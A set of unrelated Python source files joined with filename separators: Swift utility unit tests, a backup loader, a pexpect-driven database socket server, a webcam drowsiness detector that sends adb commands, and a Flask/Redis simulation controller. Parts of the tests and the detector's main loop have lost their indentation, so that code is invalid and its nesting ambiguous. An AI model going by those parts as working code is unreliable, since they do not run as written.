self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEquals('\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
def test_thread_locals(self):
logger = utils.get_logger(None)
orig_thread_locals = logger.thread_locals
try:
self.assertEquals(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEquals(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEquals(logger.thread_locals, ('5678', '5.6.7.8'))
finally:
logger.thread_locals = orig_thread_locals
def test_no_fdatasync(self):
called = []
class NoFdatasync:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync:
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEquals(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEquals(called, [12345])
class TestThreadpool(unittest.TestCase):
    """utils.ThreadPool dispatch behavior with and without worker threads."""

    def _thread_id(self):
        # Identify the thread actually executing the work.
        return threading.current_thread().ident

    def _capture_args(self, *args, **kwargs):
        return {'args': args, 'kwargs': kwargs}

    def _raise_valueerror(self):
        # int() on a non-numeric string raises ValueError.
        return int('fishcakes')

    def test_run_in_thread_with_threads(self):
        tp = utils.ThreadPool(1)

        my_id = self._thread_id()
        other_id = tp.run_in_thread(self._thread_id)
        # With a worker available, the work runs off the calling thread.
        self.assertNotEqual(my_id, other_id)

        result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
        self.assertEqual(result, {'args': (1, 2),
                                  'kwargs': {'bert': 'ernie'}})

        # Exceptions raised by the work propagate back to the caller.
        self.assertRaises(ValueError, tp.run_in_thread,
                          self._raise_valueerror)

    def test_force_run_in_thread_with_threads(self):
        # with nthreads > 0, force_run_in_thread looks just like
        # run_in_thread
        tp = utils.ThreadPool(1)

        my_id = self._thread_id()
        other_id = tp.force_run_in_thread(self._thread_id)
        self.assertNotEqual(my_id, other_id)

        result = tp.force_run_in_thread(self._capture_args, 1, 2,
                                        bert='ernie')
        self.assertEqual(result, {'args': (1, 2),
                                  'kwargs': {'bert': 'ernie'}})

        self.assertRaises(ValueError, tp.force_run_in_thread,
                          self._raise_valueerror)

    def test_run_in_thread_without_threads(self):
        # with zero threads, run_in_thread doesn't actually do so
        tp = utils.ThreadPool(0)

        my_id = self._thread_id()
        other_id = tp.run_in_thread(self._thread_id)
        self.assertEqual(my_id, other_id)

        result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
        self.assertEqual(result, {'args': (1, 2),
                                  'kwargs': {'bert': 'ernie'}})

        self.assertRaises(ValueError, tp.run_in_thread,
                          self._raise_valueerror)

    def test_force_run_in_thread_without_threads(self):
        # with zero threads, force_run_in_thread uses eventlet.tpool, which
        # still runs the work off the calling thread
        tp = utils.ThreadPool(0)

        my_id = self._thread_id()
        other_id = tp.force_run_in_thread(self._thread_id)
        self.assertNotEqual(my_id, other_id)

        result = tp.force_run_in_thread(self._capture_args, 1, 2,
                                        bert='ernie')
        self.assertEqual(result, {'args': (1, 2),
                                  'kwargs': {'bert': 'ernie'}})

        self.assertRaises(ValueError, tp.force_run_in_thread,
                          self._raise_valueerror)
class TestAuditLocationGenerator(unittest.TestCase):
    """audit_location_generator should yield only real object files."""

    def _make_hash_dir(self, tmpdir):
        # Build drive/data/partition2/suffix2/hash2 under tmpdir and return
        # the hash directory path (shared setup for the object tests).
        hash_path = os.path.join(tmpdir, "drive", "data", "partition2",
                                 "suffix2", "hash2")
        os.makedirs(hash_path)
        return hash_path

    def test_non_dir_contents(self):
        # Stray plain files at the partition/suffix/hash levels must be
        # skipped rather than descended into.
        with temptree([]) as tmpdir:
            data = os.path.join(tmpdir, "drive", "data")
            os.makedirs(data)
            with open(os.path.join(data, "partition1"), "w"):
                pass
            partition = os.path.join(data, "partition2")
            os.makedirs(partition)
            with open(os.path.join(partition, "suffix1"), "w"):
                pass
            suffix = os.path.join(partition, "suffix2")
            os.makedirs(suffix)
            with open(os.path.join(suffix, "hash1"), "w"):
                pass
            locations = utils.audit_location_generator(
                tmpdir, "data", mount_check=False
            )
            self.assertEqual(list(locations), [])

    def test_find_objects(self):
        # A .dat file inside a full hash directory tree is yielded with its
        # drive and partition.
        with temptree([]) as tmpdir:
            hash_path = self._make_hash_dir(tmpdir)
            obj_path = os.path.join(hash_path, "obj1.dat")
            with open(obj_path, "w"):
                pass
            locations = utils.audit_location_generator(
                tmpdir, "data", ".dat", mount_check=False
            )
            self.assertEqual(list(locations),
                             [(obj_path, "drive", "partition2")])

    def test_ignore_metadata(self):
        # Only files with the requested suffix (.dat) are yielded; the
        # companion .meta file is ignored.
        with temptree([]) as tmpdir:
            hash_path = self._make_hash_dir(tmpdir)
            obj_path = os.path.join(hash_path, "obj1.dat")
            with open(obj_path, "w"):
                pass
            meta_path = os.path.join(hash_path, "obj1.meta")
            with open(meta_path, "w"):
                pass
            locations = utils.audit_location_generator(
                tmpdir, "data", ".dat", mount_check=False
            )
            self.assertEqual(list(locations),
                             [(obj_path, "drive", "partition2")])
class TestGreenAsyncPile(unittest.TestCase):
    """Exercises utils.GreenAsyncPile: spawning, result order and waitall."""

    def test_runs_everything(self):
        call_count = [0]

        def tracked():
            call_count[0] += 1
            return call_count[0]

        pile = utils.GreenAsyncPile(3)
        for _ in xrange(3):
            pile.spawn(tracked)
        # All three spawned calls ran and each result came back once.
        self.assertEqual(sorted(result for result in pile), [1, 2, 3])

    def test_is_asynchronous(self):
        def wait_for(index):
            events[index].wait()
            return index

        pile = utils.GreenAsyncPile(3)
        for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)):
            events = [eventlet.event.Event(), eventlet.event.Event(),
                      eventlet.event.Event()]
            for idx in xrange(3):
                pile.spawn(wait_for, idx)
            # Results come back in completion order, not spawn order.
            for idx in order:
                events[idx].send()
                self.assertEqual(next(pile), idx)

    def test_next_when_empty(self):
        def noop():
            pass

        pile = utils.GreenAsyncPile(3)
        pile.spawn(noop)
        # A completed greenthread with no return value yields None...
        self.assertEqual(next(pile), None)
        # ...and a drained pile raises StopIteration.
        self.assertRaises(StopIteration, lambda: next(pile))

    def test_waitall_timeout_timesout(self):
        finished = [0]

        def snooze(sleep_duration):
            eventlet.sleep(sleep_duration)
            finished[0] += 1
            return sleep_duration

        pile = utils.GreenAsyncPile(3)
        pile.spawn(snooze, 0.1)
        pile.spawn(snooze, 1.0)
        # Only the quick greenthread beats the 0.2s deadline.
        self.assertEqual(pile.waitall(0.2), [0.1])
        self.assertEqual(finished[0], 1)

    def test_waitall_timeout_completes(self):
        finished = [0]

        def snooze(sleep_duration):
            eventlet.sleep(sleep_duration)
            finished[0] += 1
            return sleep_duration

        pile = utils.GreenAsyncPile(3)
        pile.spawn(snooze, 0.1)
        pile.spawn(snooze, 0.1)
        # Both greenthreads finish comfortably inside the 0.5s budget.
        self.assertEqual(pile.waitall(0.5), [0.1, 0.1])
        self.assertEqual(finished[0], 2)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
loader.py | # from threading import Thread
from back.mongo.backups.js import load_js
from back.mongo.backups.json import load_json
from back.mongo.backups.sass import load_sass
def load_data(path):
    """Restore every supported backup format (js, json and sass) from *path*."""
    for loader in (load_js, load_json, load_sass):
        loader(path)
# Thread(target=load_json, args=(path,)).start()
|
server.py | from threading import Thread
from socket import socket, AF_INET, SOCK_STREAM
# from subprocess import Popen, PIPE, STDOUT
import pexpect
from message_handler import MessageHandler
from rsa_ops import init_rsa
class Server:
    """TCP server bridging encrypted client connections to a local database
    binary driven through a pexpect pseudo-terminal.

    One ``./db_bin db.pocketdb`` child process is spawned per accepted
    client; each query line is relayed to the child and the output captured
    before its next ``db >`` prompt is sent back to the client.
    """

    def __init__(self, ip, port, n_con, bsize=1024):
        self.ip = ip          # interface to bind on
        self.port = port      # TCP port to listen on
        self.n_con = n_con    # listen() backlog size
        self.bsize = bsize    # receive buffer size handed to MessageHandler
        # RSA key pair used by MessageHandler to secure the channel
        self.pubkey, self.privkey = init_rsa()
        # print("pub:", self.pubkey)

    def show_attrs(self):
        # Debug helper: dump the basic connection parameters.
        print(self.ip, self.port, self.n_con)

    def handle_client(self, mh, child):
        """Serve one client until it disconnects or sends '.exit'.

        :param mh: MessageHandler wrapping the client socket
        :param child: pexpect child running the database binary
        """
        while True:
            data = mh.receive_message().strip()
            if not data:
                # Empty payload means the peer went away.
                print(">> Client disconnected")
                break
            print("Client says:", data)
            # qh = QueryHandler(data)
            # result = qh.run()
            # print("<> Data sent to query_handler and query ran")
            # res = p.communicate(input=data.encode("utf-8"))[0]
            # child.expect(b"db >*")
            child.sendline(data)
            if data == '.exit':
                # '.exit' terminates the db child, so there is no prompt to
                # wait for; acknowledge and stop serving this client.
                mh.send_message("\n\n\n")
                print(">> Client closed the database connection")
                break
            child.expect(b"db >*")
            # Everything the child printed before the matched prompt.
            res = child.before
            print("Result obtained:", res)
            if res == b'':
                # Never send an empty payload over the wire.
                res = b'\n'
            mh.send_message(res.decode("utf-8"))
        mh.close()

    def run(self):
        """Accept clients forever; one db child + handler thread each."""
        sock = socket(AF_INET, SOCK_STREAM)
        sock.bind((self.ip, self.port))
        sock.listen(self.n_con)
        print("Starting db server..")
        # p = Popen(
        # # ["./db_bin", "db.pocketdb"], stdin=PIPE, stdout=PIPE,
        # # stderr=STDOUT
        # )
        while True:
            child = pexpect.spawn("./db_bin db.pocketdb")
            # Wait for the initial prompt before handing the child out.
            child.expect(b"db >*")
            print("Db server started")
            cl, addr = sock.accept()
            print(">> Connected to a new client")
            mh = MessageHandler(cl, self.bsize, self.pubkey, self.privkey)
            Thread(target=self.handle_client, args=(mh, child)).start()
# Entry point: serve on localhost:9001 with a backlog of 3 connections.
if __name__ == '__main__':
    server = Server('127.0.0.1', 9001, 3)
    server.run()
|
capture.py | # import the necessary packages
from scipy.spatial import distance as dist
from imutils.video import VideoStream
from imutils import face_utils
from threading import Thread
import numpy as np
import playsound
import argparse
import imutils
import time
import dlib
import cv2
import subprocess
# Tracks whether the alert app is currently foregrounded on the head unit
# ("true"/"false" strings, mirroring the flag callers pass in).
status = "false"

def sound_alarm(alarm):
    """Switch the connected Android device between the alert app and the
    navigation settings screen, according to *alarm* ("true"/"false").

    An adb call is only issued when the requested state differs from the
    current one, so repeated calls with the same flag are no-ops.
    """
    global status
    # play an alarm sound
    #playsound.playsound(path)
    if alarm == "true" and status == "false":
        subprocess.call("adb shell am start -n com.example.alertapp/.MainActivity",shell=True)
        status = "true"
    elif alarm != "true" and status == "true":
        subprocess.call("adb shell am start -n com.microntek.navisettings/.MainActivity",shell=True)
        status = "false"
def eye_aspect_ratio(eye):
    """Compute the eye aspect ratio (EAR) for one set of 6 eye landmarks.

    The EAR is the sum of the two vertical landmark distances over twice the
    horizontal distance; it drops toward zero as the eye closes.
    """
    # Two vertical distances between the upper and lower lid landmarks.
    vertical = dist.euclidean(eye[1], eye[5]) + dist.euclidean(eye[2], eye[4])
    # Horizontal distance between the eye corners.
    horizontal = dist.euclidean(eye[0], eye[3])
    return vertical / (2.0 * horizontal)
def capturePicture(frame):
    """Persist the current video frame to 'face.jpeg' for later analysis."""
    cv2.imwrite('face.jpeg', frame)
# define two constants, one for the eye aspect ratio to indicate
# blink and then a second constant for the number of consecutive
# frames the eye must be below the threshold for to set off the
# alarm
EYE_AR_THRESH = 0.3
EYE_AR_CONSEC_FRAMES = 50

# initialize the frame counter as well as a boolean used to
# indicate if the alarm is going off
COUNTER = 0
ALARM_ON = False

# initialize dlib's face detector (HOG-based) and then create
# the facial landmark predictor (model file must ship next to the script)
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")

# grab the indexes of the facial landmarks for the left and
# right eye, respectively
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]

# start the video stream thread and give the camera a second to warm up
vs = VideoStream(src=0).start()
time.sleep(1.0)

# consecutive frames in which no face was detected
EyeCounter = 0

# start timer used to take a snapshot roughly once a minute
oldtime = time.time()
# loop over frames from the video stream
# NOTE(review): indentation was lost in this copy of the script, so the
# exact nesting of the ALARM_ON resets below could not be reconstructed
# with certainty — verify against the original before relying on it.
while True:
# grab the frame from the threaded video file stream, resize
frame = vs.read()
frame = imutils.resize(frame, width=450)
#capture image for emotion analysis roughly once per minute
if time.time() - oldtime > 59:
capturePicture(frame)
oldtime = time.time()
#convert it to grayscale channels
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# detect faces in the grayscale frame
rects = detector(gray, 0)
#check if faces were not detected in frame; after 70 consecutive
#face-less frames, raise the alarm
if not rects:
EyeCounter += 1
if (EyeCounter == 70):
if not ALARM_ON:
ALARM_ON = True
t = Thread(target=sound_alarm, args=("true",))
#start a thread to have the alarm sound played in the background
# NOTE(review): 'deamon' is a typo for 'daemon' — as written this sets
# an unused attribute and the thread is NOT daemonized; fix separately.
t.deamon = True
t.start()
cv2.putText(frame, "Stay Alert!", (10, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
EyeCounter = 0
ALARM_ON = False
sound_alarm("false")
# loop over the face detections
for rect in rects:
# determine the facial landmarks for the face region, then
# convert the facial landmark (x, y)-coordinates to a NumPy
# array
shape = predictor(gray, rect)
shape = face_utils.shape_to_np(shape)
# extract the left and right eye coordinates, then use the
# coordinates to compute the eye aspect ratio for both eyes
leftEye = shape[lStart:lEnd]
rightEye = shape[rStart:rEnd]
leftEAR = eye_aspect_ratio(leftEye)
rightEAR = eye_aspect_ratio(rightEye)
# average the eye aspect ratio together for both eyes
ear = (leftEAR + rightEAR) / 2.0
# compute the convex hull for the left and right eye, then
# visualize each of the eyes
leftEyeHull = cv2.convexHull(leftEye)
rightEyeHull = cv2.convexHull(rightEye)
cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)
cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)
# check to see if the eye aspect ratio is below the blink
# threshold, and if so, increment the blink frame counter
if ear < EYE_AR_THRESH:
COUNTER += 1
# if the eyes were closed for a sufficient number of frames,
# then sound the alarm
if COUNTER >= EYE_AR_CONSEC_FRAMES:
if not ALARM_ON:
ALARM_ON = True
t = Thread(target=sound_alarm, args=("true",))
# NOTE(review): same 'deamon' → 'daemon' typo as above.
t.deamon = True
t.start()
# draw an alarm on the frame
cv2.putText(frame, "Stay Alert!", (10, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
ALARM_ON = False
sound_alarm("false")
# otherwise, the eye aspect ratio is not below the blink
# threshold, so reset the counter and alarm
else:
COUNTER = 0
ALARM_ON = False
sound_alarm("false")
# show the frame
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
|
commands_controller.py | import connexion
import six
import logging
import time
#from flask import json
import pickle
import json
import os
import threading
import data_management.redisDB
from swagger_server.models.simulation import Simulation # noqa: E501
from swagger_server import util
from data_management.controller import gridController as gControl
from swagger_server.models.simulation_result import SimulationResult
from swagger_server.models.voltage import Voltage
from swagger_server.models.error import Error
from data_management.redisDB import RedisDB
from data_management.utils import Utils
from data_management.ModelException import InvalidModelException, MissingKeysException
from swagger_server.controllers.threadFactory import ThreadFactory
from more_itertools import unique_everseen
# Configure root logging once at import time; module logger keyed by file.
logging.basicConfig(
    format='%(asctime)s %(levelname)s %(name)s: %(message)s', level=logging.DEBUG)
logger = logging.getLogger(__file__)
class CommandController:
    """Singleton coordinating simulation runner threads (ThreadFactory).

    In-memory dicts track the factory object, running flags and status
    threads per simulation id; Redis flags ("run:<id>", "timestep_<id>",
    ...) mirror the state for the REST handlers below.
    """

    _instance = None
    _lock = threading.Lock()

    def __new__(cls):
        # Double-checked locking so only one instance is ever created.
        if CommandController._instance is None:
            with CommandController._lock:
                if CommandController._instance is None:
                    CommandController._instance = super(
                        CommandController, cls).__new__(cls)
        return CommandController._instance

    def __init__(self):
        # NOTE(review): __init__ runs on *every* CommandController() call
        # even though __new__ returns the shared instance, re-creating these
        # dicts — confirm no second instantiation can happen mid-run.
        self.factory = {}
        self.redisDB = RedisDB()
        self.statusThread = {}
        self.running = {}
        self.utils = Utils()

    def set_isRunning(self, id, bool):
        # Record whether simulation `id` is currently running.
        self.running[id] = bool

    def set(self, id, object):
        """Store the ThreadFactory instance for simulation `id`."""
        logger.debug("Object in set: "+str(object))
        try:
            self.factory[id] = object
            # fname="factory_"+str(id)
            #path = os.path.join("data", fname)
            #self.utils.store_data(path, object)
        except Exception as e:
            logger.debug(e)

    def get(self, id):
        # Return the stored ThreadFactory; raises KeyError for unknown ids.
        return self.factory[id]
        #fname= "factory_"+str(id)
        #path = os.path.join("data", fname)
        # return self.utils.get_stored_data(path)

    def isRunningExists(self):
        # True once at least one simulation has ever set a running flag.
        logger.debug("IsRunning exists: " + str(len(self.running)))
        if len(self.running):
            return True
        else:
            return False

    def get_isRunning(self, id):
        # Unknown ids are reported as not running.
        if id in self.running.keys():
            return self.running[id]
        else:
            return False

    def get_running(self):
        return self.running

    def get_statusThread(self, id):
        return self.statusThread[id]

    def run(self, id, json_object):
        """Start simulation `id` with the request payload *json_object*.

        Creates a ThreadFactory, starts it, and on success spawns a watcher
        thread (run_status). Returns 0 on success, 1 on failure, or the
        exception instance if setup itself raised.
        """
        logger.debug("Run in command controller started")
        self.id = id
        self.duration = json_object["sim_duration_in_hours"]
        logger.debug("Duration: "+str(self.duration))
        # Seed the progress counters read by get_simulation_status().
        self.redisDB.set("timestep_" + str(id), str(0))
        self.redisDB.set("sim_days_" + str(id), str(self.duration))
        #gridController = gControl()
        #self.factory= jsonpickle.decode(self.redisDB.get("factory: "+id))
        #self.redisDB.get("factory: " + id)
        #logger.debug("This is the factory for command controller: "+str(self.factory))
        #self.set(self.id, self.redisDB.get("factory: " + id))
        # gridController.setParameters(id,)
        #logger.debug("Thread set")
        #
        try:
            self.set(self.id, ThreadFactory(self.id, self.duration))
            logger.debug("Factory instance stored")
            # redis_db.set("factory: "+id, json.dumps(factory))
            # logger.debug("Factory: "+str(factory[id]))
            # object=redis_db.get("factory: "+id)
            # logger.debug("Factory stored in redisDB: "+str(object))
            # test= json.loads(object[id])
            # logger.debug("Factory stored in redisDB: " + str(test)+" type: "+str(type(test)))
            #self.redisDB.set("run:" + self.id, "running")
            self.redisDB.set("run:" + id, "starting")
            logger.debug("Status: "+str(self.redisDB.get("run:" + self.id)))
            logger.debug("Thread: " + str(self.get(self.id)))
            msg = self.get(self.id).startController()
            logger.debug("Answer from Thread factory: " + str(msg))
            if msg == 0:
                self.set_isRunning(id, True)
                logger.debug("Flag isRunning set to True")
                # Watcher thread polls the stop flag and aborts if needed.
                self.statusThread[id] = threading.Thread(
                    target=self.run_status, args=(id,))
                logger.debug("Status of the Thread started")
                self.statusThread[id].start()
                meta_data = {"id": id,
                             "ztarttime": time.time()}
                self.redisDB.set("run:" + id, "running")
                self.redisDB.set("id_meta:" + id, json.dumps(meta_data))
                logger.info("running status " + str(self.running))
                logger.debug("Command controller start finished")
                return 0
            else:
                self.set_isRunning(id, False)
                logger.debug("Flag isRunning set to False")
                self.redisDB.set("run:" + id, "stopped")
                logger.error("Command controller start could not be finished")
                return 1
                #self.redisDB.set("run:" + self.id, "stop")
                # return buildAnswer(listNames, listValues, json_object.threshold_high, json_object.threshold_medium,
                # json_object.threshold_low)
        except Exception as e:
            logger.error(e)
            return e
        #self.set_isRunning(self.id, True)
        #logger.debug("Flag isRunning set to True")
        #logger.info("running status " + str(self.running))
        #logger.info("running status " + str(self.redisDB.get("run:" + self.id)))
        #logger.debug("from redis: "+str(self.factory)+" type: "+str(type(self.factory)))
        # self.factory=ThreadFactory()
        #logger.debug("Normal: " + str(self.factory) + " type: " + str(type(self.factory)))
        #listNames, listValues = self.factory.startController()
        # return "started"
        # return (listNames, listValues)
        # return buildAnswer(listNames, listValues, json_object.threshold_high, json_object.threshold_medium, json_object.threshold_low)

    def abort(self, id):
        """Stop the controller thread for `id` and mark it stopped."""
        logger.debug("Abort signal received")
        logger.debug("This is the factory object: " + str(self.get(id)))
        if self.factory[id]:
            self.factory[id].stopControllerThread()
            self.set_isRunning(id, False)
            message = "System stopped succesfully"
            self.redisDB.set("run:" + id, "stopped")
            logger.debug(message)
        else:
            message = "No threads found"
            logger.debug(message)

    def run_status(self, id):
        """Watcher loop: poll every 2s for completion or a 'stop' flag,
        then abort the simulation and exit."""
        while True:
            status = self.get(id).is_running()
            flag = self.redisDB.get("run:" + id)
            logger.debug("Control run_status: "+str(flag))
            #logger.debug("status " + str(status))
            if status == "True" or (flag is not None and flag == "stop"):
                logger.debug("Control run_status: "+str(flag))
                self.redisDB.set("run:" + id, "stopping")
                self.abort(id)
                break
            time.sleep(2)
# Module-level singleton handle used by the REST endpoint functions below.
variable = CommandController()
def abort_simulation(id):  # noqa: E501
    """Aborts a running simulation

    If the user of the professional GUI decides to abort a running simulation this call will be triggered # noqa: E501

    :rtype: None
    """
    # Writes "stop" to the run flag and then polls (up to ~15s) until the
    # watcher thread reports the system as stopped.
    try:
        redis_db = RedisDB()
        flag = redis_db.get("run:" + id)
        message = ""
        if flag is not None and flag == "running":
            logger.debug("System running and trying to stop")
            redis_db.set("run:" + id, "stop")
            time.sleep(1)
            flag = redis_db.get("run:" + id)
            logger.debug("Flag in stop: " + str(flag))
            if flag is None:
                logger.debug("System stopped succesfully")
                message = "System stopped succesfully"
            elif "stopping" in flag:
                message = "System stopped succesfully"
                counter = 0
                # Poll once per second; give up after 15 attempts.
                while ("stopping" in flag):
                    flag = redis_db.get("run:" + id)
                    counter = counter + 1
                    if counter >= 15:
                        message = "system stopped succesfully"
                        break
                    else:
                        time.sleep(1)
                logger.debug("System stopped succesfully")
            elif "stopped" in flag:
                logger.debug("System stopped succesfully")
                message = "System stopped succesfully"
            else:
                message = "Problems while stopping the system"
        elif flag is not None and flag == "stopped":
            logger.debug("System already stopped")
            message = "System already stopped"
        elif flag is None:
            logger.debug("System already stopped")
            message = "System already stopped"
    except Exception as e:
        logger.error(e)
        # NOTE(review): messages contain typos ("succesfully", "stoping");
        # left untouched because callers may compare these strings.
        message = "Error stoping the system"
    return message
def get_simulation_status(id):  # noqa: E501
    """Get the status of the simulation

    Returns the progress of simulation `id` as an integer percentage, or a
    human-readable string when the id is unknown / the run never started,
    or a (message, 406) tuple when the runner reported an error. # noqa: E501

    :param id: ID of the simulation
    :type id: str

    :rtype: float
    """
    try:
        dir = os.path.join("data", str(id))
        if not os.path.exists(dir):
            return "Id not existing"
        redis_db = RedisDB()
        flag = redis_db.get("run:" + id)
        logger.info("flag: " + str(flag))
        # 'is None' instead of '== None' (idiomatic identity check).
        if flag is None or flag == "created":
            return "Simulation has not been started"
        logger.debug("#############Getting status#####################")
        status_message = redis_db.get("status_" + str(id))
        if status_message == "OK":
            timestep = int(redis_db.get("timestep_" + str(id)))
            logger.debug("timestep " + str(timestep))
            sim_days = int(redis_db.get("sim_days_" + str(id)))
            logger.debug("sim_days " + str(sim_days))
            # Progress as percentage of completed timesteps.
            status = (timestep / (sim_days - 1)) * 100.0
            if timestep == (sim_days - 1):
                flag_stop = redis_db.get("opt_stop_" + id)
                logger.debug("flag stop " + str(flag_stop))
                if flag_stop == "False":
                    # Optimiser still running: hold back the last percent.
                    status = status - 1
            return int(status)
        else:
            return status_message, 406
    except Exception as e:
        logger.error(e)
        # Bug fix: this path previously assigned a local and fell through,
        # implicitly returning None; now the message is actually returned.
        return "id not present"
def run_simulation(id, body=None):  # noqa: E501
    """Runs a simulation

    Runs a simulation # noqa: E501

    :param id: ID of the simulation that should be started
    :type id: str
    :param body: Configuration data for the simulation e.g. duration
    :type body: dict | bytes

    :rtype: List[SimulationResult]
    """
    logger.info("Running Simulation ...")
    if connexion.request.is_json:
        logger.info("Start command for simulation ID: " + id)
        data = connexion.request.get_json()
        logger.debug("data "+str(data)+" type "+str(type(data)))
        # The simulation must have been created first (its data dir exists).
        dir = os.path.join("data", str(id))
        if not os.path.exists(dir):
            return "Id not existing"
        redisDB = RedisDB()
        # flag = redis_db.get(id)
        flag = redisDB.get("run:" + id)
        logger.info("flag: " + str(flag))
        if flag is not None and flag == "running":
            return "System already running"
        else:
            try:
                # Delegate to the CommandController singleton; 0 == started.
                msg = variable.run(id, data)
                if msg == 0:
                    msg_to_send = "System started succesfully"
                else:
                    msg_to_send = "System could not start"
                return msg_to_send
            except (InvalidModelException, MissingKeysException) as e:
                logger.error("Error " + str(e))
                redisDB.set("run:" + id, "stopped")
                return str(e)
    else:
        logger.error("Wrong Content-Type")
        return "Wrong Content-Type"
